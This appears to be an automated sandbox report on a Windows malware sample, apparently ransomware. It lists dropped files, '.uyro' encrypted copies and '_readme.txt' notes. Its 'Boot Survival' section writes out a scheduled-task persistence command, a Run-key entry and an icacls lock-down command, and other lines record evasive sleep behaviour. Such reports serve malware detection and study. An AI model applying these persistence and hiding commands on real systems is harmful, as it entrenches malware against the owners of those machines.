Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hu\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ug\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\et\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDrive.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pa-Arab-PK\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\prs-AF\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lv\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gu\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\af\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\cs\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en-GB\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fa\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DmiProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\yo-NG\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sr-Cyrl-RS\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\GenericProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\si-LK\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\WimProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ha-Latn-NG\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CompatProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sr-Cyrl-BA\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\_readme.txt
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\_readme.txt

Boot Survival

Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId, 1_2_00481920
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIADAP.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe TID: 2852 Thread sleep time: -700000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 4684 Thread sleep count: 346 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 4684 Thread sleep time: -77850s >= -30000s
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 348 Thread sleep count: 593 > 30
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Thread delayed: delay time: 700000
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 593
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sd-Arab-PK\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\VhdProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\LogProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\MsiProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pt-BR\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\eu\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sv\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismCore.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gl\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AppxProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sr-Latn-RS\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tr\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CompatProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismCore.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\quc\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveStandaloneUpdater.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IBSProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DmiProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CbsProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\vi\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mk\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\quz-PE\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\te\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IBSProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fi\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sw\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\OfflineSetupProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileCoAuth.exe.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDrive.exe.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\de\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mr\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FolderProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pt-PT\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nl\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileSyncHelper.exe.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\ProvProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FolderProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kn\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sq\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\id\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bn-BD\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fr\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\SysprepProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ne-NP\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\cy-GB\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hy\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ti\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\uk\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\CR_4BAC1.tmp\setup.exe.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bs-Latn-BA\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en-US\msipc.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\SmiProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ms\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nn-NO\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveUpdaterService.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ka\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ca-Es-VALENCIA\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lt\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gd\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Application Data\Application Data\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pa\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mi-NZ\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ru\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\ImagingProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\am-ET\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zh-CN\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\OSProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\az-Latn-AZ\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tk-TM\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hr\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileSyncConfig.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\TransmogProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\he\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AssocProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nb-NO\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ky\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\km-KH\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mt-MT\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveStandaloneUpdater.exe.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ro\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\tmpCDDA.tmp.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CbsProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ml-IN\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sl\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ta\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismProv.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ja\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kok\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\be\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IntlProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\DismHost.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveSetup.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\ImagingProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\is\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ca\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nso-ZA\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tg\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mn\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pl\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmpCDDA.tmp
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lb-LU\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileSyncHelper.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\SetupPlatformProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileCoAuth.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\xh-ZA\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sk\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fil-PH\FileSync.LocalizedResources.dll.mui
